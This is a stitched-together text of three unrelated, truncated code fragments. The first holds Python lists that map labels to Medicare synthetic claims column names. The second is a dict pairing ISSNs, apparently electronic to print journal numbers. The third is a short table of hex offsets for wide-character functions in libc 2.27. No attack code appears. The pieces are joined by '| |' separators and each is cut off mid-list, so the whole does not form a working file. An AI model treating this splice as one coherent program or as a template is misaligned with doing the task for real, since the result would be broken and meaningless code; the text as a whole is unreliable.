("'Line Beneficiary Primary Payer Paid Amount 4'", "LINE_BENE_PRMRY_PYR_PD_AMT_4"),
("'Line Beneficiary Primary Payer Paid Amount 5'", "LINE_BENE_PRMRY_PYR_PD_AMT_5"),
("'Line Beneficiary Primary Payer Paid Amount 6'", "LINE_BENE_PRMRY_PYR_PD_AMT_6"),
("'Line Beneficiary Primary Payer Paid Amount 7'", "LINE_BENE_PRMRY_PYR_PD_AMT_7"),
("'Line Beneficiary Primary Payer Paid Amount 8'", "LINE_BENE_PRMRY_PYR_PD_AMT_8"),
("'Line Beneficiary Primary Payer Paid Amount 9'", "LINE_BENE_PRMRY_PYR_PD_AMT_9"),
("'Line Beneficiary Primary Payer Paid Amount 10'", "LINE_BENE_PRMRY_PYR_PD_AMT_10"),
("'Line Beneficiary Primary Payer Paid Amount 11'", "LINE_BENE_PRMRY_PYR_PD_AMT_11"),
("'Line Beneficiary Primary Payer Paid Amount 12'", "LINE_BENE_PRMRY_PYR_PD_AMT_12"),
("'Line Beneficiary Primary Payer Paid Amount 13'", "LINE_BENE_PRMRY_PYR_PD_AMT_13"),
("'Line Coinsurance Amount 1'", "LINE_COINSRNC_AMT_1"),
("'Line Coinsurance Amount 2'", "LINE_COINSRNC_AMT_2"),
("'Line Coinsurance Amount 3'", "LINE_COINSRNC_AMT_3"),
("'Line Coinsurance Amount 4'", "LINE_COINSRNC_AMT_4"),
("'Line Coinsurance Amount 5'", "LINE_COINSRNC_AMT_5"),
("'Line Coinsurance Amount 6'", "LINE_COINSRNC_AMT_6"),
("'Line Coinsurance Amount 7'", "LINE_COINSRNC_AMT_7"),
("'Line Coinsurance Amount 8'", "LINE_COINSRNC_AMT_8"),
("'Line Coinsurance Amount 9'", "LINE_COINSRNC_AMT_9"),
("'Line Coinsurance Amount 10'", "LINE_COINSRNC_AMT_10"),
("'Line Coinsurance Amount 11'", "LINE_COINSRNC_AMT_11"),
("'Line Coinsurance Amount 12'", "LINE_COINSRNC_AMT_12"),
("'Line Coinsurance Amount 13'", "LINE_COINSRNC_AMT_13"),
("'Line Allowed Charge Amount 1'", "LINE_ALOWD_CHRG_AMT_1"),
("'Line Allowed Charge Amount 2'", "LINE_ALOWD_CHRG_AMT_2"),
("'Line Allowed Charge Amount 3'", "LINE_ALOWD_CHRG_AMT_3"),
("'Line Allowed Charge Amount 4'", "LINE_ALOWD_CHRG_AMT_4"),
("'Line Allowed Charge Amount 5'", "LINE_ALOWD_CHRG_AMT_5"),
("'Line Allowed Charge Amount 6'", "LINE_ALOWD_CHRG_AMT_6"),
("'Line Allowed Charge Amount 7'", "LINE_ALOWD_CHRG_AMT_7"),
("'Line Allowed Charge Amount 8'", "LINE_ALOWD_CHRG_AMT_8"),
("'Line Allowed Charge Amount 9'", "LINE_ALOWD_CHRG_AMT_9"),
("'Line Allowed Charge Amount 10'", "LINE_ALOWD_CHRG_AMT_10"),
("'Line Allowed Charge Amount 11'", "LINE_ALOWD_CHRG_AMT_11"),
("'Line Allowed Charge Amount 12'", "LINE_ALOWD_CHRG_AMT_12"),
("'Line Allowed Charge Amount 13'", "LINE_ALOWD_CHRG_AMT_13"),
# Inpatients
("'Claim Line Segment'", "SEGMENT"),
("'Claims start date'", "CLM_FROM_DT"),
("'Claims end date'", "CLM_THRU_DT"),
("'Claim Payment Amount'", "CLM_PMT_AMT"),
("'NCH Primary Payer Claim Paid Amount'", "NCH_PRMRY_PYR_CLM_PD_AMT"),
("'Inpatient admission date'", "CLM_ADMSN_DT"),
("'Claim Pass Thru Per Diem Amount'", "CLM_PASS_THRU_PER_DIEM_AMT"),
("'NCH Beneficiary Inpatient Deductible Amount'", "NCH_BENE_IP_DDCTBL_AMT"),
("'NCH Beneficiary Part A Coinsurance Liability Amount'", "NCH_BENE_PTA_COINSRNC_LBLTY_AM"),
("'NCH Beneficiary Blood Deductible Liability Amount'", "NCH_BENE_BLOOD_DDCTBL_LBLTY_AM"),
("'Claim Utilization Day Count'", "CLM_UTLZTN_DAY_CNT"),
("'Inpatient discharged date'", "NCH_BENE_DSCHRG_DT"),
# Outpatients
("'Claim Line Segment'", "SEGMENT"),
("'Claims start date'", "CLM_FROM_DT"),
("'Claims end date'", "CLM_THRU_DT"),
("'Claim Payment Amount'", "CLM_PMT_AMT"),
("'NCH Primary Payer Claim Paid Amount'", "NCH_PRMRY_PYR_CLM_PD_AMT"),
("'NCH Beneficiary Blood Deductible Liability Amount'", "NCH_BENE_BLOOD_DDCTBL_LBLTY_AM"),
("'NCH Beneficiary Part B Deductible Amount'", "NCH_BENE_PTB_DDCTBL_AMT"),
("'NCH Beneficiary Part B Coinsurance Amount'", "NCH_BENE_PTB_COINSRNC_AMT"),
# Prescription
("'RX Service Date'", "SRVC_DT"),
("'Quantity Dispensed'", "QTY_DSPNSD_NUM"),
("'Days Supply'", "DAYS_SUPLY_NUM"),
("'Patient Pay Amount'", "PTNT_PAY_AMT"),
("'Gross Drug Cost'", "TOT_RX_CST_AMT"),
]
# Edit logical_attributes to adapt to new set of logical attributes.
logical_attributes = [
# Beneficiaries
("'Chronic Condition: Alzheimer or related disorders or senile'", "SP_ALZHDMTA"),
("'Chronic Condition: Heart Failure'", "SP_CHF"),
("'Chronic Condition: Chronic Kidney Disease'", "SP_CHRNKIDN"),
("'Chronic Condition: Cancer'", "SP_CNCR"),
("'Chronic Condition: Chronic Obstructive Pulmonary Disease'", "SP_COPD"),
("'Chronic Condition: Depression'", "SP_DEPRESSN"),
("'Chronic Condition: Diabetes'", "SP_DIABETES"),
("'Chronic Condition: Ischemic Heart Disease'", "SP_ISCHMCHT"),
("'Chronic Condition: Osteoporosis'", "SP_OSTEOPRS"),
("'Chronic Condition: Rheumatoid Arthritis or Osteoarthritis (RA/OA)'", "SP_RA_OA"),
("'Chronic Condition: Stroke/transient Ischemic Attack'", "SP_STRKETIA"),
]
# Edit textual_attributes to adapt to new set of textual attributes.
textual_attributes = [
# Beneficiaries
#("'End stage renal disease Indicator'", "BENE_ESRD_IND"),
("'Beneficiary Code'", "DESYNPUF_ID"),
("'State Code'", "SP_STATE_CODE"),
("'County Code'", "BENE_COUNTY_CD"),
# Carriers
("'Beneficiary Code'", "DESYNPUF_ID"),
("'Claim ID'", "CLM_ID"),
("'Claim Diagnosis Code 1'", "ICD9_DGNS_CD_1"),
("'Claim Diagnosis Code 2'", "ICD9_DGNS_CD_2"),
("'Claim Diagnosis Code 3'", "ICD9_DGNS_CD_3"),
("'Claim Diagnosis Code 4'", "ICD9_DGNS_CD_4"),
("'Claim Diagnosis Code 5'", "ICD9_DGNS_CD_5"),
("'Claim Diagnosis Code 6'", "ICD9_DGNS_CD_6"),
("'Claim Diagnosis Code 7'", "ICD9_DGNS_CD_7"),
("'Claim Diagnosis Code 8'", "ICD9_DGNS_CD_8"),
("'Provider Physician - National Provider Identifier Number 1'", "PRF_PHYSN_NPI_1"),
("'Provider Physician - National Provider Identifier Number 2'", "PRF_PHYSN_NPI_2"),
("'Provider Physician - National Provider Identifier Number 3'", "PRF_PHYSN_NPI_3"),
("'Provider Physician - National Provider Identifier Number 4'", "PRF_PHYSN_NPI_4"),
("'Provider Physician - National Provider Identifier Number 5'", "PRF_PHYSN_NPI_5"),
("'Provider Physician - National Provider Identifier Number 6'", "PRF_PHYSN_NPI_6"),
("'Provider Physician - National Provider Identifier Number 7'", "PRF_PHYSN_NPI_7"),
("'Provider Physician - National Provider Identifier Number 8'", "PRF_PHYSN_NPI_8"),
("'Provider Physician - National Provider Identifier Number 9'", "PRF_PHYSN_NPI_9"),
("'Provider Physician - National Provider Identifier Number 10'", "PRF_PHYSN_NPI_10"),
("'Provider Physician - National Provider Identifier Number 11'", "PRF_PHYSN_NPI_11"),
("'Provider Physician - National Provider Identifier Number 12'", "PRF_PHYSN_NPI_12"),
("'Provider Physician - National Provider Identifier Number 13'", "PRF_PHYSN_NPI_13"),
("'Provider Institution Tax Number 1'", "TAX_NUM_1"),
("'Provider Institution Tax Number 2'", "TAX_NUM_2"),
("'Provider Institution Tax Number 3'", "TAX_NUM_3"),
("'Provider Institution Tax Number 4'", "TAX_NUM_4"),
("'Provider Institution Tax Number 5'", "TAX_NUM_5"),
("'Provider Institution Tax Number 6'", "TAX_NUM_6"),
("'Provider Institution Tax Number 7'", "TAX_NUM_7"),
("'Provider Institution Tax Number 8'", "TAX_NUM_8"),
("'Provider Institution Tax Number 9'", "TAX_NUM_9"),
("'Provider Institution Tax Number 10'", "TAX_NUM_10"),
("'Provider Institution Tax Number 11'", "TAX_NUM_11"),
("'Provider Institution Tax Number 12'", "TAX_NUM_12"),
("'Provider Institution Tax Number 13'", "TAX_NUM_13"),
("'Line HCFA Common Procedure Coding System 1'", "HCPCS_CD_1"),
("'Line HCFA Common Procedure Coding System 2'", "HCPCS_CD_2"),
("'Line HCFA Common Procedure Coding System 3'", "HCPCS_CD_3"),
("'Line HCFA Common Procedure Coding System 4'", "HCPCS_CD_4"),
("'Line HCFA Common Procedure Coding System 5'", "HCPCS_CD_5"),
("'Line HCFA Common Procedure Coding System 6'", "HCPCS_CD_6"),
("'Line HCFA Common Procedure Coding System 7'", "HCPCS_CD_7"),
("'Line HCFA Common Procedure Coding System 8'", "HCPCS_CD_8"),
("'Line HCFA Common Procedure Coding System 9'", "HCPCS_CD_9"),
("'Line HCFA Common Procedure Coding System 10'", "HCPCS_CD_10"),
("'Line HCFA Common Procedure Coding System 11'", "HCPCS_CD_11"),
("'Line HCFA Common Procedure Coding System 12'", "HCPCS_CD_12"),
("'Line HCFA Common Procedure Coding System 13'", "HCPCS_CD_13"),
("'Line Processing Indicator Code 1'", "LINE_PRCSG_IND_CD_1"),
("'Line Processing Indicator Code 2'", "LINE_PRCSG_IND_CD_2"),
("'Line Processing Indicator Code 3'", "LINE_PRCSG_IND_CD_3"),
("'Line Processing Indicator Code 4'", "LINE_PRCSG_IND_CD_4"),
("'Line Processing Indicator Code 5'", "LINE_PRCSG_IND_CD_5"),
("'Line Processing Indicator Code 6'", "LINE_PRCSG_IND_CD_6"),
("'Line Processing Indicator Code 7'", "LINE_PRCSG_IND_CD_7"),
("'Line Processing Indicator Code 8'", "LINE_PRCSG_IND_CD_8"),
| |
'2090-5769',
'1755-8743': '1755-8735',
'2211-9140': '2211-9132',
'2075-1354': '2070-0733',
'2165-3364': '2165-3356',
'1958-9190': '1634-2941',
'0025-6307': '0748-1756',
'2160-7001': '1071-121X',
'2052-4307': '0969-4900',
'2224-4662': '1565-9801',
'2160-8776': '2160-8741',
'1558-1195': '1049-3301',
'2168-202X': '2168-2011',
'2162-5824': '2162-5816',
'2233-9337': '2005-8039',
'1466-1810': '0267-3037',
'1793-6888': '0219-6336',
'1572-9346': '1381-298X',
'1867-7185': '1001-0521',
'2163-0070': '2168-1678',
'1875-9068': '1574-1699',
'2164-005X': '2163-9914',
'2328-5273': '2328-4633',
'2157-1740': '2157-1732',
'2278-7135': '2249-4863',
'1809-9246': '1413-3555',
'2187-5626': '0915-5287',
'2090-3081': '2090-3073',
'1985-2274': '1985-207X',
'2092-6448': '2093-2340',
'2090-9195': '2090-9187',
'2008-8469': '2008-4633',
'2322-3219': '2322-4436',
'2288-1778': '2288-176X',
'2251-9645': '2251-9637',
'2164-2656': '2164-2648',
'2162-2388': '2162-237X',
'2287-903X': '2287-8882',
'2080-4873': '2080-4806',
'1472-1481': '1355-5146',
'1746-0980': '1746-0972',
'1793-6640': '0217-9849',
'1557-3168': '1089-3504',
'2193-3405': '0033-8230',
'2162-9986': '2162-9978',
'2212-1455': '2212-1447',
'2162-8149': '2162-8130',
'1687-0425': '0161-1712',
'1469-9710': '0142-6397',
'2160-5858': '2160-5831',
'1873-7153': '0016-2361',
'1573-8345': '0010-5082',
'1569-9978': '0378-4177',
'2157-5452': '1559-3940',
'2320-4753': '2278-9626',
'2152-0712': '2152-0704',
'2069-8534': '2069-8267',
'2212-8298': '2212-828X',
'1927-7008': '1927-6990',
'1477-0326': '0267-6583',
'1678-4626': '0101-7330',
'2169-8961': '2169-8953',
'2283-3420': '2282-8419',
'1532-5318': '1072-0162',
'1573-0468': '0922-680X',
'2329-0862': '2329-0870',
'2163-1867': '2163-1840',
'1741-1130': '1741-1122',
'2299-0046': '1642-395X',
'2084-4298': '1730-7503',
'2213-8862': '1991-7902',
'1756-0802': '1756-0799',
'2228-7531': '2228-7523',
'2251-7308': '2228-5881',
'2229-7685': '0259-1162',
'2188-8426': '1346-8650',
'2008-0700': '1735-4668',
'2008-4234': '2008-2258',
'2192-5690': '2192-5682',
'2251-9599': '2251-953X',
'2345-6418': '2345-6485',
'1309-0380': '1309-0399',
'2093-3797': '2092-9862',
'2228-7876': '1735-7780',
'2251-7472': '2251-7464',
'2251-8819': '2251-8363',
'2050-1250': '2050-1242',
'2278-4306': '2278-330X',
'2250-1002': '2231-0762',
'1744-5531': '1744-5523',
'2252-0058': '2008-384X',
'1537-2642': '0889-3365',
'1469-9885': '1357-6275',
'2213-8595': '2213-8587',
'2224-6509': '2224-3992',
'2325-1298': '2325-128X',
'1873-2100': '0306-4549',
'1573-8353': '0009-3122',
'1475-3073': '1474-7464',
'1303-6130': '1300-0527',
'1745-8099': '1745-8080',
'1741-3087': '0305-7356',
'1934-7405': '1934-7391',
'1573-7020': '1381-4338',
'1953-8030': '0245-7466',
'1662-596X': '1662-5986',
'2324-8068': '2324-805X',
'1909-9991': '1909-9762',
'1572-9451': '1018-4864',
'1540-6040': '1535-6841',
'1710-1131': '0008-4506',
'2046-0260': '2046-0252',
'2211-6931': '2211-6923',
'2049-9469': '2049-9450',
'2049-9442': '2049-9434',
'2163-5803': '2163-5781',
'1758-1958': '1758-194X',
'1878-5514': '1468-6996',
'2027-3444': '0120-4319',
'2156-4647': '2156-4639',
'1469-6711': '1354-9839',
'2212-8808': '2212-8794',
'2330-460X': '2330-4596',
'2231-4016': '2231-4008',
'2047-1890': '2047-1882',
'1477-0296': '0309-1333',
'1935-4940': '1935-4932',
'2067-7855': '1224-5593',
'2165-7416': '2165-7408',
'1945-0710': '0360-7275',
'2071-2936': '2071-2928',
'1573-1502': '0924-6460',
'2331-2432': '2331-2424',
'1863-2513': '1863-2505',
'2177-8833': '1983-8409',
'1984-7726': '0101-3335',
'1938-6737': '1938-5862',
'2169-0502': '2169-0499',
'1988-8287': '1696-7240',
'2305-5847': '2305-5839',
'1865-0481': '1865-0473',
'2326-6074': '2326-6066',
'1993-6095': '1815-9346',
'2325-8306': '2325-8292',
'2161-1238': '2161-122X',
'1090-7009': '0162-5748',
'2161-7333': '2161-7325',
'1878-0040': '1755-4586',
'1572-9516': '0015-9018',
'1436-5081': '0026-9255',
'1434-6052': '1434-6044',
'1543-2793': '0888-4781',
'1569-9773': '1568-1475',
'1432-0924': '0178-7675',
'1745-1027': '1057-0314',
'2166-5052': '2166-5044',
'2281-7565': '2281-5872',
'1869-5469': '1869-5450',
'2161-8089': '2161-8070',
'2227-4561': '2227-457X',
'2169-0707': '2169-0693',
'2190-8249': '1867-299X',
'2325-0712': '2325-0704',
'1572-9869': '0928-1371',
'1759-8281': '1759-8273',
'2232-111X': '1985-2533',
'1461-7080': '1461-4456',
'2190-9164': '2195-5840',
'1752-1289': '1752-1270',
'1809-4392': '0044-5967',
'2195-4720': '0933-4807',
'1827-1707': '0394-3410',
'1521-3749': '0044-2313',
'1741-3117': '1473-3250',
'1552-4590': '1069-0727',
'1873-958X': '1873-9598',
'1532-7868': '1092-6488',
'2046-2174': '2046-2166',
'1947-2943': '1947-2935',
'2325-1549': '2325-1557',
'1467-9671': '1361-1682',
'2151-7509': '2194-6299',
'1877-6116': '2210-6871',
'1552-8340': '0042-0859',
'1753-8971': '1753-8963',
'1665-9686': '1870-249X',
'1545-8504': '1545-8490',
'2157-9636': '2156-7794',
'2033-6772': '2033-6403',
'1558-4305': '0891-7736',
'1793-8317': '1793-8309',
'2160-8806': '2160-8792',
'2165-8110': '2165-8102',
'2165-3380': '2165-3372',
'2193-8660': '2193-8652',
'1936-9298': '1936-928X',
'2213-0772': '2213-0764',
'2228-5059': '2008-8868',
'1573-4803': '0022-2461',
'2079-9799': '2079-9780',
'2161-7627': '2161-7597',
'2167-6984': '2167-6968',
'2288-6796': '2288-6575',
'2213-7173': '2213-7165',
'1879-2707': '0022-1694',
'1756-1760': '1756-1752',
'1872-7441': '0165-232X',
'2090-7958': '2090-7893',
'1560-683X': '2078-1865',
'1464-5211': '0020-739X',
'1465-7341': '8756-6222',
'2164-3210': '2164-3202',
'2090-5351': '2090-5343',
'1492-1367': '0316-0041',
'2047-7481': '2047-7473',
'2330-1538': '2330-152X',
'1904-0016': '1901-2276',
'2168-0248': '2168-023X',
'1879-3622': '1751-7214',
'2291-2797': '2291-2789',
'2326-5205': '2326-5191',
'1741-2927': '1476-718X',
'2011-7922': '2011-2084',
'1873-2240': '0168-1923',
'1879-9272': '1879-9264',
'2326-831X': '2326-8298',
'1875-4805': '1875-4791',
'2168-1597': '2168-1589',
'1573-1472': '0006-8314',
'1867-8548': '1867-1381',
'2212-4306': '2212-4292',
'1552-4205': '0007-6503',
'2049-5994': '2049-5986',
'1949-2901': '1942-8200',
'2347-3517': '2347-3584',
'1758-714X': '0965-4283',
'1897-4295': '1734-9338',
'0976-3260': '0972-7531',
'2212-4276': '2212-4268',
'1347-7501': '1340-3516',
'2008-2177': '1680-6433',
'2008-2207': '2008-3009',
'1735-9287': '1735-8639',
'2090-6412': '2090-6404',
'2213-3666': '0975-962X',
'2090-6439': '2090-6420',
'2090-665X': '2090-6641',
'2194-7627': '2194-7619',
'1308-8742': '1308-8734',
'2279-042X': '2319-9644',
'0975-1904': '0974-7052',
'2278-0203': '2278-1897',
'2226-7190': '2303-9027',
'2233-6257': '2233-6249',
'2333-0376': '2333-0384',
'2051-2201': '1355-8250',
'1366-5812': '0010-7514',
'2051-8161': '2051-8153',
'2213-2414': '2213-2406',
'1572-8838': '0021-891X',
'2224-4778': '2224-476X',
'1521-0588': '0149-0400',
'2150-7708': '2150-7686',
'2093-985X': '2093-9868',
'2051-6355': '2051-6347',
'2314-4416': '2314-4408',
'2154-8641': '2154-8633',
'2330-0566': '2330-0558',
'1460-3616': '0263-2764',
'2228-5326': '2008-9295',
'2053-3705': '2053-3691',
'2296-6501': '2296-6498',
'2313-4607': '2304-8336',
'2093-6729': '1738-2262',
'1984-0063': '1984-0659',
'2049-937X': '2049-9361',
'2050-6414': '2050-6406',
'2051-0144': '2051-0136',
'2314-7156': '2314-8861',
'2048-9153': '2048-9145',
'1792-7463': '1108-7471',
'2287-1292': '2287-1012',
'2288-2413': '2288-2405',
'1741-5020': '0963-6048',
'2296-5262': '2296-5270',
'2050-2885': '2050-2877',
'2251-9149': '2251-9130',
'1943-2747': '1065-8025',
'1557-9948': '0278-0046',
'0973-8746': '0973-340X',
'1931-390X': '1931-3896',
'1837-6746': '1837-6738',
'2212-5566': '2212-5558',
'1546-5012': '1546-2234',
'1927-0534': '1927-0526',
'1927-0895': '1927-0887',
'2333-4711': '2333-4703',
'2090-2077': '2090-2069',
'2163-3134': '1557-234X',
'2227-0426': '0253-8253',
'2288-5943': '2288-5919',
'2322-3618': '2008-8140',
'1541-4620': '1541-4612',
'1432-0894': '0930-7575',
'1913-9055': '1913-9047',
'2169-5032': '1555-3434',
'1746-1987': '1746-1979',
'1558-2167': '1558-2159',
'1897-4317': '1895-5770',
'2008-2401': '2008-2398',
'1942-2970': '1942-2962',
'2093-4939': '2005-940X',
'2277-6559': '2249-4308',
'2228-6721': '2008-9783',
'2162-4461': '2162-4453',
'2296-1887': '2296-1895',
'1939-9340': '0018-9235',
'1752-0118': '0265-9883',
'1460-6976': '0001-8732',
'0974-0252': '0019-5502',
'1878-1535': '1631-0705',
'1465-3885': '0265-0533',
'1434-4599': '1553-2739',
'1557-2072': '1557-2064',
'1879-1859': '0926-9851',
'1744-263X': '1744-2621',
'2320-1789': '2320-1770',
'1744-4217': '0013-838X',
'1744-4233': '1382-5577',
'1528-9036': '0021-8936',
'1555-1423': '1555-1415',
'1469-4395': '1355-770X',
'1548-9574': '0260-3594',
'1944-7078': '1530-9827',
'1528-9044': '1043-7398',
'1528-8919': '0742-4795',
'1551-6989': '1550-624X',
'1528-8978': '0094-9930',
'1528-8986': '0199-6231',
'1528-8900': '0889-504X',
'1750-0133': '1355-5502',
'1468-0122': '0264-3944',
'1947-2501': '1947-2498',
'1755-7550': '1364-5145',
'2168-0418': '2168-0396',
'2045-0931': '2045-0923',
'1873-4081': '1369-8001',
'2327-3801': '2327-3798',
'1532-7973': '0835-1813',
'2165-7432': '2165-7424',
'2291-6466': '2291-6458',
'1617-4917': '1617-4909',
'2196-8837': '2197-3792',
'2049-548X': '2049-5471',
'2150-1300': '2150-1297',
'2165-1442': '2165-1434',
'1474-774X': '1474-7731',
'2326-473X': '2326-4705',
'1873-7285': '0997-7538',
'2164-5396': '2164-5388',
'2160-8091': '0008-0845',
'1875-676X': '1573-4129',
'1940-2325': '0091-5521',
'2156-8111': '2156-8103',
'1541-3101': '0164-212X',
'2216-0280': '0120-5307',
'2151-2299': '1614-0001',
'2047-3877': '2047-3869',
'2193-3685': '2193-3677',
'2168-2305': '2168-2291',
'1607-887X': '1026-0226',
'2325-0992': '2325-0984',
'2052-4129': '2052-4110',
'1839-3942': '0312-8008',
'1557-0878': '1098-2140',
'1735-9392': '1735-8949',
'1878-1217': '1359-6349',
'1996-8450': '0038-271X',
'2345-3729': '1735-0344',
'2008-6490': '2008-6482',
'2228-7949': '2228-7930',
'0975-5616': '0975-0770',
'2251-872X': '2251-8711',
'2211-5374': '2211-5366',
'2329-4523': '2329-4515',
'2161-7198': '2161-718X',
'2332-2225': '2332-2217',
'1938-9809': '1556-763X',
'2212-1684': '1875-9637',
'1469-4360': '0266-4666',
'2051-3909': '2051-3895',
'2186-3342': '2186-6953',
'1879-3592': '1383-5718',
'1388-2139': '1383-5742',
'2381-3121': '0162-6434',
'2040-4271': '2040-4263',
'2329-8464': '2329-8456',
'1943-7862': '0733-9364',
'2191-2491': '2191-2483',
'2052-5656': '2052-5648',
'2300-5653': '2299-2634',
'2214-5532': '2214-5524',
'2162-2167': '2162-2159',
'1573-1642': '1083-8155',
'2161-7414': '2161-7406',
'2330-2488': '2331-5024',
'2154-8684': '2154-8676',
'2329-3713': '2329-3691',
'1873-3263': '0959-4752',
'1567-2344': '0889-3675',
'1940-9206': '1524-0657',
'1883-2148': '1880-4276',
'2008-4692': '2008-4684',
'2191-7485': '2192-001X',
'2161-6752': '2161-6728',
'1552-6585': '1538-5132',
'1573-0840': '0921-030X',
'2211-6109': '2211-6095',
'2326-5531': '2326-5523',
'1758-7239': '1359-0790',
'1925-4059': '1925-4040',
'1941-1359': '1941-1340',
'1925-4075': '1925-4067',
'1874-4621': '1874-463X',
'2067-2284': '1843-6587',
'1469-9265': '1356-3475',
'1757-188X': '1757-1871',
'2329-4248': '2329-423X',
'1528-9796': '1552-8014',
'1552-6593': '0885-4122',
'2165-0020': '2165-0012',
'2169-6594': '0047-0813',
'1893-4641': '1893-4633',
'2212-554X': '2212-5531',
'2053-4876': '2053-4868',
'1558-2183': '1045-9219',
'1940-7661': '1940-767X',
'2193-5815': '2193-5807',
'2053-714X': '2095-5138',
'2314-4874': '2314-4866',
'1521-4001': '0044-2267',
'1548-0569': '0272-8397',
'2153-5477': '2153-5434',
'1945-7685': '1945-7669',
'1996-2088': '0065-1346',
'1753-1063': '1753-1055',
'1477-2728': '1043-9463',
'2325-1263': '2325-1255',
'1405-9274': '1607-050X',
'1862-6270': '1862-6254',
'1941-4153': '1941-4145',
'1940-4387': '1045-988X',
'2083-5728': '1232-9886',
'2167-647X': '2167-6461',
'1862-5215': '1434-663X',
'2224-2880': '1109-2769',
'1948-7169': '1557-0614',
'2161-4695': '2161-4687',
'1556-6048': '1556-603X',
'1879-2464': '0301-679X',
'1873-1236': '0966-6923',
'1873-3999': '0094-114X',
'2046-5815': '2046-5807',
'1433-7479': '1432-7643',
'2314-5714': '2314-5706',
'1945-5534': '0067-270X',
'1873-2984': '0364-5916',
'1945-2837': '1945-2829',
'2326-2621': '2326-263X',
'1872-7409': '0950-7051',
'1755-0491': '1755-0483',
'2168-0922': '2168-0906',
'2325-2189': '2325-2170',
'1090-2686': '0278-4165',
'1873-6025': '0950-5849',
'1432-2064': '0178-8051',
'1558-2558': '1089-7798',
'2155-8264': '2155-8256',
'2092-7673': '1598-5032',
'2314-6516': '2356-7538',
'1873-5606': '1359-4311',
'2330-0337': '2162-643X',
'1755-635X': '1755-6341',
'2287-2388': '2287-237X',
'1927-1220': '1927-1212',
'2226-4523': '2226-4531',
'1793-690X': '0219-6913',
'2090-2778': '2090-276X',
'2330-314X': '2330-3131',
'2314-789X': '2356-6787',
'1662-4505': '1662-2685',
'1986-5961': '0350-199X',
'1755-3547': '1755-3539',
'2042-8367': '1757-0980',
'2213-2961': '2095-2546',
'2273-421X': '2258-8094',
'1588-2756': '1585-8553',
'2163-2332': '2163-2324',
'2036-7465': '2036-7457',
'2329-0390': '2329-0382',
'2156-5295': '2156-5287',
'2348-926X': '2348-0548',
'1747-5767': '1747-5759',
'1752-248X': '1752-2471',
'2040-5804': '2040-5790',
'1468-0025': '0266-7177',
'1758-681X': '1758-6801',
'1365-2206': '1356-7500',
'1574-0218': '1574-020X',
'1349-6336': '0914-9244',
'1877-8879': '1877-8860',
'1533-8665': '0195-6086',
'2214-5753': '2214-5745',
'2352-0787': '2352-0779',
'1883-1737': '1882-6954',
'2169-9690': '2169-9682',
'2278-0513': '2278-1668',
'1612-7501': '1610-241X',
'1745-1035': '1051-0974',
'1552-7395': '0899-7640',
'1874-1746': '1874-1738',
'2296-4495': '0037-8615',
'1469-8110': '1351-3249',
'2288-3657': '2288-3649',
'2008-4161': '2008-3645',
'2228-7442': '2008-126X',
'2186-361X': '2186-3644',
'2194-7643': '2194-7635',
'2193-651X': '2193-8237',
'2193-6544': '2193-8261',
'2193-6382': '2193-8229',
'2193-6528': '2193-8245',
'1530-9312': '0891-2017',
'2345-461X': '2345-4644',
'2044-4761': '2044-4753',
'2039-2117': '2039-9340',
'1558-2205': '1051-8215',
'2214-0883': '2095-1779',
'1554-4788': '1554-477X',
'2326-4497': '2326-4489',
'2330-1643': '2330-1635',
'1863-0669': '1863-0650',
'1945-0680': '1945-0672',
'2168-4804': '2168-4790',
'2168-183X': '2168-1821',
'1476-3508': '0889-311X',
'1927-128X': '1927-1271',
'2373-0196': '2373-0188',
'1477-9803': '1053-1858',
'1758-7077': '0264-4401',
'2090-2379': '1110-5704',
'1307-9948': '1304-2947',
'2324-8041': '2324-8033',
'2215-3489': '0252-9521',
'1727-9380': '1022-0119',
'2155-2509': '2155-2487',
'1687-1499': '1687-1472',
'1572-9265': '1017-1398',
'2152-7393': '2152-7385',
'2210-6510': '2210-6502',
'2279-0780': '2319-2003',
'2191-0243': '0334-8938',
'1521-3919': '1022-1344',
'1938-5307': '1092-6194',
'1479-277X': '1046-3283',
'2162-1535': '0275-3987',
'1942-6593': '0042-0905',
'2162-142X': '2162-139X',
'2215-0374': '2215-0366',
'1755-1196': '1477-1756',
'1470-1545': '0272-2631',
'2158-6578': '2158-656X',
'2040-512X': '2040-5111',
'2095-4697': '2095-4689',
'1468-3156': '1354-4187',
'1923-2950': '1923-2942',
'1861-9959': '1610-1928',
'1569-982X': '1384-6647',
'2152-0801': '2152-0798',
'2314-7938': '2356-6833',
'2331-379X': '1555-2284',
'2214-1413': '2214-1405',
'1573-1634': '0169-3913',
'1559-8985': '1070-4698',
'1793-7132': '1016-2372',
'2168-2232': '2168-2216',
'1533-4015': '1082-9784',
'2045-2713': '1466-6529',
'2168-3611': '2168-3603',
'1573-8701': '1569-1721',
'1460-2067': '0010-4620',
'1532-8627': '1522-2942',
'2162-6553': '0896-2960',
'2010-1406': '2010-1392',
'1874-6047': '0423-2607',
'1534-6250': '1523-3820',
'2329-5805': '0076-9266',
'1615-1488': '1615-147X',
'2328-4854': '2328-4846',
'2169-2467': '2169-2459',
'2307-5023': '2352-7536',
'1868-422X': '1868-4238',
'2320-7078': '2349-6800',
'1937-0245': '1936-7244',
'2090-9098': '1110-7782',
'1542-5185': '1542-5177',
'1435-1528': '0035-4511',
'1563-5104': '0308-1079',
'1545-1577': '1094-2939',
'2281-695X': '0026-1424',
'1469-5782': '0964-5292',
'2156-7026': '2156-7018',
'2157-9644': '2153-2516',
'2164-313X': '2164-3121',
'1793-642X': '0129-6264',
'2331-2734': '2331-2726',
'1361-6641': '0268-1242',
'2372-3556': '2372-3548',
'1520-5703': '0161-4940',
'2232-0245': '2232-0253',
'1755-2427': '1755-2419',
'1471-6909': '0954-2892',
'2322-1674': '2322-1488',
'2322-4835': '2322-2476',
'2049-4645': '2049-4637',
'2090-6595': '2090-6587',
'2090-6617': '2090-6609',
'2322-3561': '2322-2220',
'2288-1956': '1598-9100',
'1308-8521': '1300-0705',
'2252-0724': '2228-7914',
'2356-6124': '2356-7759',
'2188-8361': '1344-1272',
'2288-6761': '2288-6478',
'2282-0930': '2282-2305',
'2164-5558': '2164-5531',
'1925-962X': '1925-9611',
'1470-840X': '1470-8396',
'1946-4673': '1946-4681',
'2329-4310': '2329-4302',
'1876-763X': | |
(0x20cbc30, 0, 'wcsncasecmp', 'libc_2_27'),
(0x20cbca0, 0, '__wcscasecmp_l', 'libc_2_27'),
(0x20cbca0, 0, 'wcscasecmp_l', 'libc_2_27'),
(0x20cbd00, 0, '__wcsncasecmp_l', 'libc_2_27'),
(0x20cbd00, 0, 'wcsncasecmp_l', 'libc_2_27'),
(0x20cc650, 0, '__isoc99_wscanf', 'libc_2_27'),
(0x20cc830, 0, '__isoc99_vwscanf', 'libc_2_27'),
